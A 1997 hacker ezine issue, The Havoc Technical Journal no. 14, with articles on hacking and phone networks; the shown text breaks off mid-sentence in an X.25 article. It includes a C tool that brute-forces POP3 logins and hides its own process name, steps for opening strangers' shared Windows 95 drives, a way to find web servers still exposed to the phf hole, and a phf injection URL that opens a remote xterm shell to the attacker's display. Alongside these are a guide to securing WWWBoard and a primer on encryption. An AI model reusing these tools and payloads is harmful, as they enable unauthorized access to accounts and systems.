💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › THTJ › thtj14.t… captured on 2022-01-08 at 17:24:46.

View Raw

More Information

⬅️ Previous capture (2021-12-04)

-=-=-=-=-=-=-

     ������������������������������������������������������������������Ŀ
     �Vol. 2 No. 2       The Havoc Technical Journal            Issue 14��
     �                     - http://www.thtj.com -                      ��
     �       September 1, 1997 - A Havoc Bell Systems Publication       ��
     �������������������������������������������������������������������ٱ
      ��������������������������������������������������������������������

������������������������������������������������������������������������������
           
          �THTJ - Writing text files like they're going outta style�  
                   ��������������������������������������Ŀ
                �-=�THTJ���[14]����Contents����[14]���THTJ�=-�
                   ����������������������������������������
                 Editorial..............................Scud-O
                 Spreading the knowledge................KungFuFox 
                 Pop3.c mail port hacker................memor
                 Securing your WWWBoard.................Black Sol
                 Hacking Win95 With NBTSTAT.............W3|rd
                 More on cgi-bin holes..................]NiCK[
                 Encryption for dumbasses...............t33
                 More info on X.25 than the CIA has!....memor
                 Beyond HOPE review.....................AlienPhreak
                 Tatoo pager info and more..............memor   
                 Help-a-phreak..........................THTJ
                 Oddville, THTJ.........................Scud-O
                 The News: HOPE, AOL Haxors, & SPAM!....KungFuFox
                 Logs...................................THTJ
               ������������������������������������������������
                   ��������������������������������������Ŀ
                   �  thtj.com is proud to now be hosting �
                   � global kOS - http://www.thtj.com/kOS/�
                   �            check it out.             �
                   ����������������������������������������
������������������������������������������������������������������������������
�����������������������������������������������������Ŀ
�The Havoc Technical Journal - contacts & information � 
�������������������������������������������������������

  - Editor in Chief : Scud-O, scud@thtj.com
  - Assistant Editor : KungFuFox, mazer@cycat.com  
  - Submissions Editor: Keystroke, keystroke@thepentagon.com
  - thtj email address: thtj@thtj.com
  - thtj website: http://www.thtj.com/
  - thtj mailing address: PO BOX 448 Sykesville, MD 21784

  The Havoc Technical Journal Vol. 2, No. 2, September 1st, 1997.  
  A Havoc Bell Systems Publication.  Contents Copyright (�) 
  1997 Havoc Bell Systems Publishing.  All Rights Reserved.  
  No part of this publication may be reproduced in whole or 
  in part without the expressed written consent of Havoc 
  Bell Systems Publishing.  [No copying THTJ, damnit.]
  
  The Havoc Technical Journal does in no way endorse the 
  illicit use of computers, computer networks, and 
  telecommunications networks, nor is it to be held liable 
  for any adverse results of pursuing such activities.

  For information about using articles published in THTJ, send mail to:
    E-mail: thtj@thtj.com
    US-mail: THTJ c/o HBS, PO Box 448, Sykesville, MD 21784
������������������������������������������������������������������������������
��������������������������������������Ŀ
� Editorial by Scud-O                  � 
����������������������������������������
     
     I'm taking a break from writing an editorial this month because I've   
been especially busy with THTJ for most of August, cya next month.
                                                            Scud-O
    ----------------------------------------------
  /       ---/   --/  /   /  |  /------/   /    /
 /---       /-----/------/-----/      /   /    /
/----------/                         /--------/
             -of Havoc Bell Systems-

         scud@thtj.com | http://www.thtj.com

������������������������������������������������������������������������������
����������������������������������������Ŀ
� Spreading the knowledge - by KungFuFox � 
������������������������������������������

It's survived for 14 issues, the first 3 spoken of only in legend. It's 
succeeded where others have failed. It's stood the test of time. It's past
its first birthday. Hooray for THTJ. A lot goes into making a publication 
like this, and even more goes into putting it out on time. Funny how that's
not the norm in the world of ezines, coming out on time. I guess it's the
pressure of a deadline that's scared people away from the idea. 

Taking a look at the booming industry of ezines out there, I can't help but 
notice that not many of them make it very far. For whatever reason, they fall 
below the horizon far sooner than they should. Maybe the initial motivation 
to make the zine was no longer there, or maybe the editors didn't get enough 
articles to keep publishing; something just didn't go right. They all started
off with the same goal, to bring information to the public. I think it's 
noble that people are still out there trying to spread the knowledge, because 
I think that's what ezines are for. They help the community by giving them 
the knowledge that they would have a great deal of trouble getting otherwise.

As I reflect on the maturity of THTJ, on the changes it's gone through over 
time, I do feel a good deal of pride in its success. From its early days of 
paper form, through its evolution as an ezine, and to the present point, its 
message has stayed the same; spread the knowledge. We spread the knowledge 
every month, with the seemingly endless stream of articles that are sent in 
from everyday people like you, from the community. We sure as hell couldn't 
survive without the help of our reader/writers. 

This zine has kept going because the idea of spreading the knowledge isn't 
extinct, and hopefully it never will be. That's what freedom of speech is all
about, isn't it? Not about burning flags, or dressing in drag, or whatever.
It's about being able to exchange information without barriers, without  
censors, without the challenge of fighting your allies to learn. If there 
were no ezines, if nobody out there had the motivation to spread the 
knowledge, if it was an every man for himself community, we'd be censoring
ourselves by holding the knowledge away from the people who want it, who can
use it. 

Zines like Phrack and PLA have kept the scene informed, and laughing, for
the duration of this decade (and in the case of Phrack, for a good chunk of
the 80s as well). It is their success that has brought many a newbie into the 
scene, just because of the openness and freedom of knowledge exchange that 
these zines have promoted. Though 2600 is not an ezine, and not free, it
has kept the public informed for many years. It has also indirectly 
influenced the ezine industry for some time now, forcing those who want the 
knowledge to stay free to make their own ezines, and keep the knowledge 
flowing. 

Many a zine have come and gone, making maybe 1, maybe 2 issues. And of those 
many, perhaps 1 in 20 of them makes a 3rd, and a 4th, and keeps the knowledge 
flowing, but just 1 out of 20 is all it takes to keep the scene alive. There
are some newcomers out there, starting out like the many before them, and 
they're continuing the tradition, taking over where others have left off.
Zines like System Failure, Zero, Ocean County Phone Punx, and Confidence 
Remains High. They all show promise, and I'm sure there are many more like 
them that I don't even know about. It can only be hoped that this trend of 
knowledge spreading never ends, and should it ever, by the hand of some 
contemptuous hypocrite, we'll not be the disgraced for trying.

The Havoc Technical Journal is going to continue to spread the knowledge for
as long as it can, but nothing lasts forever, and times do change. We're 
aiming to better ourselves, to make this publication as informative, as 
interesting, and as entertaining as possible. The opinions of our readers are
the best way for us to judge our strengths, our weaknesses, to determine what
it is we're doing right, and what it is we need to be doing. Flame us if 
necessary, just let us know what you want to see, what you don't want to see
and what it is you see that you think is really swell. Operators are standing
by!

KungFuFox <mazer@cycat.com>

������������������������������������������������������������������������������
������������������������������������Ŀ
� Pop3.c mail port hacker - by memor � 
��������������������������������������

/*
     A little pop3 "hacker" by memor 
     
     Sends a USER username and PASS username to a pop3 server on port 110  
     read from a passwd file on the target server. (I guess that passwd
     file is shadowed and you are trying to gain access to some joe accounts)
     
     Compile it with cc -o pop3 pop3.c
     
     Usage: pop3 server-ip passwdfile port(optional)
     
     Tested on linux 2.0.30




/* Includes for File managing, String managing.. Default c commands, exit
   commands, socket managing */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>

/* Defining Global variables */
/* Defining a socket, a string, 2 functions */

FILE *soc;
char *str;
int sock;
void answer();
void sending();

/* main routine */

int main(int argc, char *argv[])
{

/* defining a for the users counter, strr as a string for containing username,
   port, count as file counter, structure for socket */

int a;
FILE *userfile;
char *strr;
char *ips;
int count, port = 110;
struct sockaddr_in ip;

/* space in the 3 strings.. */

str = (char *)malloc(100);
strr = (char *)malloc(100);
ips = (char *)malloc(100);

/* you need more arguments if you want it to work..  server port is not
   needed cause pop is on port 110 */

if ( argc < 3  )
     {
                    printf("Usage: %s (ip of pop3 server) (userfile) (server port)\n", argv[0]);
                exit(1);
          }
          else
               if ( argc > 2 ) 
     {
          if(argc > 3) port = atoi(argv[3]); /* if port argument defined */
          userfile = fopen(argv[2],"r"); /* opening the userfile */
          if(userfile == NULL )  /* is the userfile open? */
               {
                    printf("Userfile doesnt exist..\n");
                    exit(1);
               }
     }
/* argv[1] -> ips.. so i'll nuke argv [1] and the others argv for hiding all of that now :) */
strcpy(ips,argv[1]);

/* now i hide all as some man using.. */
sprintf(argv[0],"man        ");
sprintf(argv[1],"               ");
sprintf(argv[2],"               ");
if(argc>3) sprintf(argv[3],"               ");



 do /* lets begin a loop for userfile reading */
     /* open a socket for connecting */
     {
     if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
          {    
                    perror("socket");
                    exit(0); /* bye */
               }
     /* i need to read you as a file, miss socket */
     soc=fdopen(sock, "r");

     /* fill target address structur */
     ip.sin_family = AF_INET;
          ip.sin_port = htons(port);
          ip.sin_addr.s_addr = inet_addr(ips);
          bzero(&(ip.sin_zero),8);
     
     
     /* counters are 0 now.. but in a few ? ;) */
     a=0;
     count=0;
     do   /* lets begin to get an username */
          {

               strr[count]=fgetc(userfile); /* i catch a caracter in the file */
               if(strr[count]==':') /* is it a ':' ? */
                    {
                    strr[count]='\0';
                    a=1; /* it is a ':' so i'll forget to get the others caracters */
                    }
               if(strr[count]==13) strr[count]='\0';  /* it is a 13? ok.. i forget it too */
          strr[count+1]='\0'; /* i make my string */
          count++; /* counting for filling strr */
          }
     while(strr[count-1]!=10 && strr[count-1]!=EOF); /* stop if we find the lf or end of file caracters */
          
          if(strr[count-1]!=EOF && strlen(strr)>1) /* is my username > 1 caracter and am i not at the end of file ? */
               {
                    if(strr[count-1]==10) strr[count-1]='\0'; /* if i see a lf, i kill it*/
               printf("Username attempt: ->%s<-\n",strr); /* what is the username trying */
               sprintf(str,"USER %s\n",strr); /* copy the USER name in str */

                /* connect to the pop3 server */
                    if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 )  /* i cant connect it? */  
                    {
                              perror("connect");
                         exit(1); /* bye bye .. :) */
                    } /* so i can connect it that mean if i am here.. */
                    else
                    {
                    /* server is talking.. */
                         printf("Server.. hello..\n"); 
                    answer(); /* please tell me what does the server says */
                    printf("%s",str); /* now i send that USER name*/
                    sending(); /* sending it.. */
                    printf("Server is answering...");
                    answer(); /* answer +OK from the server i guess */
                    sprintf(str,"PASS %s\n",strr); /* i'll send now that PASS name i first fill str with it*/
                    printf("%s",str);  /* ok i am ready to send it */
                    sending(); /* sending it .. */
                    printf("Server is answering...");
                    answer(); /* i am receiving or a +ERR or a +OK i guess */
                    printf("Ok finish for that ROUND.. \n"); 

                              /* finished that round*/

                              close(sock); /* closing that socket */

                          }

               }
     }while(strr[count-1]!=EOF); /* im not at the end of file? so i continue */

}

/* sending string str */

void sending()
{
if ( send(sock, str, strlen(str), 0) < 0 )    /* can't i send str ? */
     {
                perror("send");
                exit(1); /* i cant, so see you later */
               } 

}

/* receiving caracters from the server */

void answer()
{
/* first.. a caracter is a char type.. */
char ch; 
do
     { /* begin receiving caracters */
     ch=getc(soc);
          printf("%c",ch); /* please tell me what the server says */
      } 
while(ch!='\r'); /* ok i received a 13.. i guess he wont talk anymore now.. i hope */
printf("\n");  
}    

������������������������������������������������������������������������������
���������������������������������������Ŀ
� Securing your WWWBoard - by Black Sol � 
�����������������������������������������

Note: this is intended for those with their own websites;
and use Matts WWWBoard CGI Script (http://www.worldwidemart.com/scripts)
This is a perl script for a message board system, and as all programs,
carries bugs which can be easily exploited. If you have this perl script
running on your site, or plan on it, this text may be almost necessary for
its safety.

Well, more and more sites these days appear to have the WWWBoard script which
allows any person to post a message to your board, and let others read it. 
This is considered a very convenient tool, but, as everything, has flaws and
can be exploited. The first part of this is the security issue brought up 
with the associated WWWAdmin program that goes with WWWBoard, and second, an 
issue of editing the PERL Script itself for better security.

WWWAdmin Hole: |
---------------+
The Exploit: 
Used to remove messages from your board, WWWAdmin is used very commonly when
a person uses WWWBoard. The default file name is
                        /wwwboard_Directory/wwwadmin.cgi or www.admin.pl

You also must have a user name and password, which is stored in the 
passwd.txt file. This can be a very big problem. The method WWWAdmin uses to 
encrypt the password is the same as normal unix passwords, so therefore, 
password crackers, like CrackerJack or John the Ripper can be used to crack 
it.

The way it is displayed is this:
WebAdmin:aepTOqxOi4i8U
WebAdmin is the username and aepTOqxOi4i8U is the encrypted password. If you
put this into unix format, lets say..
WebAdmin:aepTOqxOi4i8U:275:15:Emmanuel Goldstein:/usr/homos/egold:/bin/csh

and then, used sturdy old John the Ripper to crack it, you'd come up with the
password WebBoard. Then, you'd just have to go to lets say
www.host.com/wwwboard/wwwadmin.cgi or wwwadmin.pl and use WebAdmin and
WebBoard as the password, and you can edit and delete all their stuff..

How to Fix it:
Don't panic because you might get hacked by some ego-maniac kid hacker who
doesn't have anything better to do then ruin other peoples fun, this can be
easily fixed. There are several methods, i suggest using all of them for
maximum security.

Method #1 - Don't use the standard wwwadmin.pl or wwwadmin.cgi for the name.
Use some random numbers and letters when uploading this to your server, for
instance, make it wadawambrblah.cgi. This way, only you will even know where
the admin script is, so even if they get the password they won't know where 
to go!

Method #2 - Don't use the standard passwd.txt for the passwd file. Change it
also to something random like sdihff.bla - NOTE - you must also make this
change in the WWWAdmin script, under the location for your passwd file. More
details in the WWWAdmin readme file..

Method #3 - As soon as you upload it, IMMEDIATLY change the username and
password! And do not use common words, most words can be found in wordlists,
which basically means, you can still get hacked..use random names, like
ajgndnbvfd for the password, etc. etc., you get the point (i hope). Make it
LONG and use numbers as well, like a4mg4msdfsd9as9.

Note - be sure to keep your passwords written down, so you can remember them!

Method #4 - When you change your password, make sure it is more then 8
letters+numbers. Password crackers crack up to 8 characters, so, if your
password is longer then that, and someone gets your password file; they can
only crack the first 8 letters/numbers, and they can't get the rest of the
password.

Method #5 - Modify your PERL script so only ip's from your ISP (internet
service provider) can access the wwwadmin script, whatsoever. Note - more on
this below!

Method #6 - Chmod your passwd text file and even wwwadmin cgi script so that
nobody can access it, and then when you need to use it, you can chmod it back
to world readable/executable.

For example, log in to your shell, and then do the following:

-+-
cd wwwboard (wwwboard being the name of the dir everything is in)
chmod o-rwx passwd.txt (passwd.txt being the name of the passwd file for
                        wwwadmin)
chmod o-x wwwadmin.cgi (wwwadmin.cgi being the name of the wwwadmin script
                        file)
-+-

That's all. now if someone tries to access your WWWAdmin or your password 
file, they will get a Forbidden Access error. However, so will you. So, when 
you want to use your wwwadmin script, go back to your shell and do this:

-+-
cd wwwboard
chmod o+rwx passwd.txt
chmod o+x wwwadmin.cgi
-+-
Its as simple as that.
                              
Modifying the PERL Script for more security:  |
----------------------------------------------+
In most situations, people using WWWBoard do not know PERL, the programming
language that it is written in. Knowing PERL can benefit you greatly. What
are some things you could do if you knew how to edit the perl script?

1) Ban certain people from using your board

2) Ban all people from a certain internet provider from using your board

3) Stop other people from using your nickname/handle

4) Record the IP, Internet Address, Web Browser, time and date, and the
   message that person posted; to a file each time somebody posts.

5) Change the background colors, background appearance, and the general
   appearence, and layout of the board to YOUR liking.

6) Display information such as a persons IP and web browser in their post.

7) Require a username and password to make posts.

8) Stop other people from accessing your WWWAdmin script.

Unfortunately, to describe how to actually DO those things it'd take another
text in itself :) You can check out this site for some pointers with perl:

http://www.ora.com/catalog/pperl2/excerpt/ch01-01.htm

Until then, I can include one method you can use. It is pretty easy to
include somebodies IP or host in a post. Start off with these two lines, in
the top, with the other variables:

# Start perl sample
$host = $ENV{'REMOTE_HOST'};
$ip = $ENV{'REMOTE_ADDR'};
# End perl sample


Those two lines will put the persons IP and host into two little variables.
Now, in the procedure where it writes to the html file, you can include those
two variables to display the poster's info. The procedure to put this into is
new_file If your unsure of where to put this, just look for a print NEWFILE
"blah blah\n"; statement..you can look for where it says something like
"posted by $name" or whatever, and you can just add $host or $ip into the
line somewhere.

������������������������������������������������������������������������������
���������������������������������������Ŀ
� Hacking Win95 With NBTSTAT - by W3|rd � 
�����������������������������������������

Requirements for the hack to work:
Windows 95 & the Victim must run NETBIOS and have "sharing" on their hard 
drives.

   First type 'nbtstat -A x.x.x.x'

   If your lucky you'll get something like this.

        NetBIOS Remote Machine Name Table
    Name               Type         Status
 ---------------------------------------------
 ^M0REBID       <00>  UNIQUE      Registered
 VIRTUAL COMPUTE<00>  GROUP       Registered
 ^M0REBID       <03>  UNIQUE      Registered
 MAC Address = 44-45-53-54-00-00

   Remember the first UNIQUE name here.

   Now create 'lmhosts' in your windows dir.
   it should look like this:

x.x.x.x ^M0REBID

   Then you purge nbtstat like this: 'nbtstat -r'

   Then goto Find -> Computers
   on the Start Menu in Windows 95.
   Type in the UNIQUE name and search.
   Then if found , double click on the name , and if you get up a window with 
   for example C and D .. you will have Access to his harddrives.. ;)

   You may now read his/her files ... and remember be creative... ;)
   (But remember , some people might have sharing on..but with pwd!)   

   Mission Accomplished...

   Thankz to: iO and ^D-BL00D^ (my Co-prez in NHF)
    
   W3|rd - Prez. of Norwegian Hacker Force, and a Rebel X Hacker.  

������������������������������������������������������������������������������
��������������������������������������Ŀ
� More on cgi-bin holes - by ]NiCK[    � 
����������������������������������������

1 - The largest server database helps exploit phf


     I have appointed: ALTA-VISTA ! :) yeah ! if you know the syntax of
     this websearch well enough, you can succeed to have a list of more
     than 3000 insecure servers with this method, simply by typing:

     http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=.
     &q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1=
     (type this all in on one line)

     Too easy! Isn't it? Also, you can modify it to search for php.cgi,
     webgais, or others such as view-source...
     
 Note:  Sometimes, some servers won't work... but its just because the
        database isn't updated every day.


2 - Other stuff to exploit websearchs


     I love the "Yellow Pages" of organizations, enterprises, or companies
     like for instance Adminnet (www.adminet.com)... its filled with kewl
     insecure web servers.. But the problem is that it's not very
     interesting to scan manually... So, I wrote a little program to change
     the html index of web servers into a list of exploitable servers for
     phfscan or phpscan...

     Here is a little unix script:

--
if [ $# = 0 ]
then
echo "Usage: html2list file.html" >&2
exit 1
cat $1 | grep '"http://' | tr '"' '\n' | grep '^http://' | cut -c8- |tr '/'
'\n' |grep '\.' | grep -vi '\.html\|\.htm' |sort -u > $1.list
        (one again, the last 2 lines need to be moved up together)
--

 Note:  You can change/update it to a better way of scanning...


3 - Xterm with phf


     Cracking the /etc/passwd ! ok... but there are better things to do
     than waste your time. This attack consists of using Xterm with phf.
     So, of course Xwindows must be present on the victim server, and you
     must also be running it. While in Xwindows, write this: 'xhost
     +www.victim.com' This is so your machine will accept connections
     from victim.com... You can simply type 'xhost +', but it isn't really
     secure... After, you must know what os www.victim.com is running,
     so you can guess the path of Xterm.
     
     Here are some default Xterm paths for a few systems:
     
   AIX  : /usr/bin/X11/xterm
   HP-UX: /usr/bin/X11/hpterm
   Linux: /usr/X11R6/bin/xterm
   SunOS: /usr/openwin/bin/xterm

     You can also use: 'find /usr -name xterm' or again 'whereis xterm' if
     you have a shell on the machine.

     Finally, once you have found the path, you can run xterm via phf like:

     http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/
     xterm%20-display%20your.ip.com:0    (combine these two lines)

     Wait a few seconds... and whoop, a shell from the victims server will
     appear in your Xwindow. :) Usually you become an user Nobody, but
     sometimes, if the http daemon runs in a root shell, your become root,
     or www sometimes.. The best thing is that your access is not logged
     in the lastlog or wtmp... Very clean exploit !

Have PHFun ! :)


-]NiCK[ <Modul1@usa.net>

������������������������������������������������������������������������������
��������������������������������������Ŀ
� Encryption for dumbasses - by t33    � 
����������������������������������������

This article is intended for the people who know shit about encryption and 
want a little more info about it.
Hope it is useful.

Contents:

1) What is Encryption?
2) How does Encryption work?
3) Brute Force Attack
4) Factoring Techniques
5) How Long Should a Key be?
6) Mounting an Attack
7) What is RSA?
8) What is DES?
9) What us Substitution?
10) What is Permutation?

1) What is Encryption?

Encryption is simply the encoding of messages so that they cannot be read by 
anyone who does not know how to decipher it. Governments and militaries have 
been using codes to make their messages unreadable for many years. For 
example, Caesar used a code to send military messages that was simply a shift 
of the letters in the message three spaces down in the alphabet (an A becomes 
a D). In cryptographic language this is known as a shift cypher.

The properties of a good cryptosystem are analogous to that of a normal lock. 
A good system will have a very large key which is one of a large number of 
keys (termed keyspace). It will also provide cyphertext (encrypted plaintext) 
that appears random and stands up to known decryption attacks. Lastly, the 
system should be suitable to the function for which it is intended. For 
example, if a message is to remain secret for ten years or more, then the 
system should take into account the future speed of computers and their 
corresponding ability to attack the system. However, except for classified 
government information (and maybe the Coca-Cola secret recipe), the reality 
is that the relevance of most corporate information traveling over networks 
is measured in days or weeks, and not decades.

2) How Does Encryption Work?

Most encryption algorithms are based on the concept of complex mathematics 
that work in only one direction and are generally based on the difficulty of 
factoring very large numbers (keys) that are used for the encryption. These 
large numbers are the product of large prime numbers. For example, anyone can 
multiply two large prime numbers to obtain a result, but it is very difficult 
for someone else to factor the large number to get back the two primes. This 
is to say that mathematicians have yet to figure out a method for reversing 
the math effectively. In this way, cryptography has been a secure method of 
ensuring data confidentiality over computer networks.

3) Brute Force Attack

The traditional method of breaking complex mathematical codes is through 
brute-force attacks. This method is mathematically the easiest to perform, 
but relies on vast computer processing power and is therefore the easiest to 
defend against. A brute force attack tries every possible combination of keys 
in order to unlock the encryption. Therefore, simply increasing the keyspace 
will increase the amount of time needed to mount a brute force attack. The 
reality is that a brute force attack is not a method which will ever be used 
to decode cyphertext. Some quick calculations relating computer speeds and 
key length will yield code-breaking times that exceed the expected life of 
the universe.

The brute force method needs a sample of unencrypted text for the computer to 
compare each decryption attempt with the actual text. This can be easily 
obtained by knowing the nature of the messages being intercepted. For 
example, all Microsoft word files will have a set of standard information 
(bytes). How the decryption functions is easy. A key that is 128 bits long 
will have 2128 possible values. Therefore, assuming that a very fast computer 
that can try one million keys per second (consider that attempting a key 
requires many instructions) it will take 225 years to try all of the 
combinations with a 50% probability that it will be found in the first 224 
years (remember that the universe is estimated to be 210 years old). (Bruce 
Schneier, Applied Cryptography c.1995).

4) Factoring Techniques

The more feasible form of attack will come from mathematicians refining 
existing and developing new factoring techniques. These methods have been 
used to show potential vulnerabilities in key-based encryption. However, they 
still require massive computer power and long time-frames to break the 
encryption. For example, a 129-digit number was factored at Bellcore labs in 
1994. This used the idle time on 1600 computers around the world, over a 
period of 8 months using a computation called the quadratic sieve. The 
authors estimated that they used .03% of the computing power of the Internet, 
and believed that, with a highly publicized event, they could acquire 100,000 
computers (approx. 2% of the Internet) without resorting to illegal or 
unethical efforts such as an Internet worm.

5) How Long Should a Key be?

The security of a cryptosystem depends on the strength of the algorithm and 
the length of the key. The strength of the algorithm is difficult to 
understand. However, understanding the methods of how the keys are decrypted 
provides some clues as to it's strength. Knowing that all numbers can be 
represented by a set of primes, encryption techniques rely on the difficulty 
of factoring very large numbers into their respective primes. Lets look at a 
very simplified example (cryptologists will undoubtedly cringe at the over
simplification):

Suppose we have number n represented by x and y such that n = xy. The 
quadratic sieve method works by first assuming that the numbers x and y are 
close to one another on a number line. Successive steps either prove or 
disprove this and search out the next numbers. Therefore, effective 
encryption will create keys which are not close to one another. However, the 
numbers cannot be so far apart as to have the one of x or y set to a very 
small value. Effective encryption-based key generation will generate the keys 
randomly, but also discard those keys which will be susceptible to 
factor-based decryption systems.

What is involved in factoring a number? Anyone with a grade six education (or 
a calculator) can easily multiply together two numbers. Anyone with a grade 9 
education (and who remembers it) can factor a small number into its primes. A 
prime number is any integer which is only divisible by itself and by 1. For 
example, the sequence of the first seven prime numbers is: 1,2,3,5,7,11,13...

Lets say we express the number 24 as a set of its primes. This is simply 
2*2*2*3 = 24. Seems simple enough. Now, for those of you who think this is 
easy, try entering the RSA factoring challenge and they will award you a 
prize if you can do it on very large numbers (see the link at the end of this 
document).

Another method called the general number field sieve can factor numbers 
approximately 10 times faster than the quadratic field sieve, but is only 
faster for larger numbers (greater than 110 digits). This method hasn't been 
refined to the degree of the quadratic sieve but, with time will likely be 
the method of choice for factoring large keys.

Factoring large numbers is very hard, but is becoming easier therefore 
predictions based on security required for long term encryption cannot be 
made. However, most people don't require their data to remain secure for 100 
years. For example, information about stock market conditions may only be 
relevant for a few days. Decisions based on that information need only be 
protected for a few hours. At the end of the day everyone's trades become 
known anyway. For a manufacturer, design specs. need only be kept secret 
until product launch. For the longest-term secrets, such as military secrets, 
key length should be based on the computing speeds at that time and the 
projected future increases. Two general rules of thumb is that computing 
power increases by a factor of 10 every five years and it is always best to 
be cautious when making predictions. 

6) Mounting an Attack

With respect to computing methods, a hardware or a software based attack can 
be mounted. Hardware designers and cryptologists have designed machines 
specifically for breaking codes which can greatly increase the rate at which 
a code is broken. This involves hundreds of parallel processors working on
different 'parts' of the key.

A software-based attack is much slower but is also much cheaper to mount. For 
example, using an algorithm with a 56 bit key, a software attempt run on 512 
workstations capable of running the algorithm at a rate of 15,000 encryptions 
per second, running 24 hours per day would require 545 years to test all 
possible numbers (Bruce Schneier, Applied Cryptography c.1995) . Importantly, 
with a 40 bit key (the only key length currently allowed for export under 
federal legislation) a similar network would take just under two days to 
complete the attack.

A 128 key makes brute force cryptanalysis effectively useless, even when 
factoring estimates for increases in the number of networked computers in the 
world and increasing processor speed. However, it is still susceptible to 
factoring methods when distributed among several computers. The next logical 
question is, why not use keys with a very large number of bits (>2000)? The 
answer lies in the tradeoff between security and usability. The longer the 
key length the longer the time needed for encryption. Encryption over a LAN
environment should not be a bottleneck in the communications.

7) What is RSA?

RSA is the industry standard for public key cryptography. Its algorithm is 
based on the difficulty of factoring large numbers. Encryption is performed 
'one-way', indicating that f(x) is the encryption function but f-1(x) is very 
hard to compute. 

8) What is DES?

Data Encryption Standard (DES) is the standard for private key encryption and 
is recognized by international standards organizations such as ANSI and ISO. 
Standard encryption schemes are needed to ensure interoperability of systems 
for the same reasons standards are needed for all network applications. The 
most important criteria for a standard (and in fact any) cryptographic scheme 
is that the security must rely on the key and not in the secrecy of the 
algorithm. By the definition of encryption, simply deducing the algorithm 
should not make it any easier to decrypt messages. 

DES uses the same key for encrypting as decrypting. This encryption is not 
based on the difficulty of factoring large numbers but is based on a set of 
non-linear transformations. The key can be any 56-bit number and there are 
few weak keys. A good example of a weak key is one that is all 0's or 1's. 
This encryption is not based on the difficulty of factoring large numbers but 
is based on a set of non-linear transformations. DES is a single combination 
of operations, substitution followed by permutation, performed on the message 
based on the key and on a set of constant values (the algorithm). This 
function is repetitive and so can be easily implemented using hardware, 
making it a very fast solution for encryption.

9) What is a Substitution?

A substitution is quite easy to understand. Letters of the alphabet can be 
randomly substituted for other letters according to a key as follows:

a b c d e f g...
q s l b z e r...

This substitution key is held by both the person coding the message and the 
person decoding the message. The key is simply the substitution of the number 
of letters in the alphabet (and could include the space-value). Therefore the 
number of permutations is simply 26!. A very large number which could not be
analyzed by brute force. However, this simple type of encryption can easily 
be analyzed using other methods.

10) What is a Permutation?

A permutation does not involve changing the values of the plaintext. A 
permutation alters their position but leaves the character values unchanged. 
The method is performed mathematically using a permutation matrix in which 
each row contains only one '1' for the row of size 'm'. The best way to 
illustrate this is through a simple alphabetic example:

We will use the following key (m=4)Value: 1 2 3 4 Key: 3 4 1 2 to encrypt the 
following: howareyou. 
First arrange in groups: howa|reyo|u 
Perform the permutation: wahoyoreu 
Decrypt with the inverse key.

DES functions by first dividing the initial text (bitstring) of length 64 
bits, into two halves (32 bits). The 32 bit string is expanded to 48 bits. An 
initial permutation is performed on the bitstring according to a function
derived from the encryption key. The DES algorithm then performs a set of 
constant substitution functions using 8 S-boxes followed by the permutation 
(An S-box is the term for a 4x16 matrix which is used to perform the 
substitution on the bitstring of length, 48 bits). This is followed by a 
round of key-based encryption using 48 of the 56 bits in the key. The whole 
set of functions is repeated 16 times.

������������������������������������������������������������������������������
��������������������������������������Ŀ
� The X.25 goods - by memor            � 
����������������������������������������

1. What is X.25 ?#
##################

     Different Network, really far for links use that protocol and equipment 
named X.25, lots of networks like Transpac, Datapac, Tymnet use that X.25 
Protocol.. It uses a hardware named PAD X.25 
(Packet Assembler/Dissassembler). Users are connecting to those PADs from a 
phone number with a or from a tcp/ip gateway from Internet, or from
another ways.. and from those PADs, they connects the X.25 servers with 
the command connect (c), you can also configure a lot of parameters for your 
connection (when you'll lost the connection, parameters will be defaults 
again.) with the commands full or half (full duplex, half duplex), the 
command set for the PAD parameters, the command par? is for displaying the
PAD parameters, stat displays your port address on the PAD. for 
disconnecting, here is the command bye or disconnect.. with that hardware, 
when connecting it, setting a right user ID, (if you can connect reverse 
charging calls host), you must know that any network has a prefix (dnic) for 
instance : 02080 is for Transpac in France.. 03110 is for telenet in USA. (of 
course, with the USER ID is required a PASSWORD.. that would be so easy ID 
xxxxxx is for the user id, and it will ask for a password after.)

2. here are the prefixs of some networks you can connect o with an x.25 pad:#
#############################################################################

     02080 is Transpac / France
     02342 is PSS / England
     02405 is Telepak / Sweden
     02624 is Datex-P / Germany
     03106 is Tymnet / USA
     03110 is Telenet / USA
     04251 is Isranet / Israel
     05252 is Telepac / Singapore

. Talking about Transpac / France (02080) :#
############################################

     Transpac is the X.25 French network that anyone can use to connect to a 
PAD in france with the numbers 3617 3615(those are expensive to call) 3614 or 
3613 (less expensive ones),...with those different numbers, you can connect 
to different services.. the most interesting services are on the expensive 
numbers and the government/companies ones with passwords and logins are on 
the less expensive ones. those hosts have an x.25 address and a nabx25.

. What is a nab X.25?#
######################

     a NABX25 in french mean Nom Abr�g� X.25, in american language, i will 
call it an X.25 Abriged NAME, that means for each nua (x25 adress), you have 
a name that u type it on those services to connect to it quickly without 
having to remember its nua (anyways, french dont know nabx25 is for,
they can connect to the hosts with the nua) 
example : for nabx25 TEASER (french server of Upload / Download in 1200 
Bauds), has the nua of 0208078270373.
On the minitel keyboard (Terminal + Modem to call those 361x numbers, you 
can directly type the nua, replacing the 02080 by 1 (1 is france) so it 
would be 178270373 )


. What is minitel and Videotex ?#
#################################

     "Minitel" is the name of that 'modem and terminal' integrated for 
connecting Videotex phone numbers like 3617, 3616, 3615, 3614, 3613, 
3606xxxx, 3605xxxx ... it is sold and rented by France Telecom in their 
agencies but can be easily replaced by an US Robotics sportster, by setting 
on the V.23 modulation (1200/75 bauds) changing the register S34 to 8 with 
ATs34=8&w (&w for saving the new settings.) or by a V.23 modulation modem 
called CAP.23, not expensive at all.. 


     Videotex is a Graphism Virtual Terminal.. not ansi like the VT, but 
Videotex, with a lot of graphics functions i explained in some thtj issues, 
before.. you can anyways download one of those videotex terminals..

     for modems connecting, they are named olicom, minitel.. (www.yahoo.com, 
     search to minitel/videotex)

     for telnet connecting (to those tcp/ip minitels), they are on 
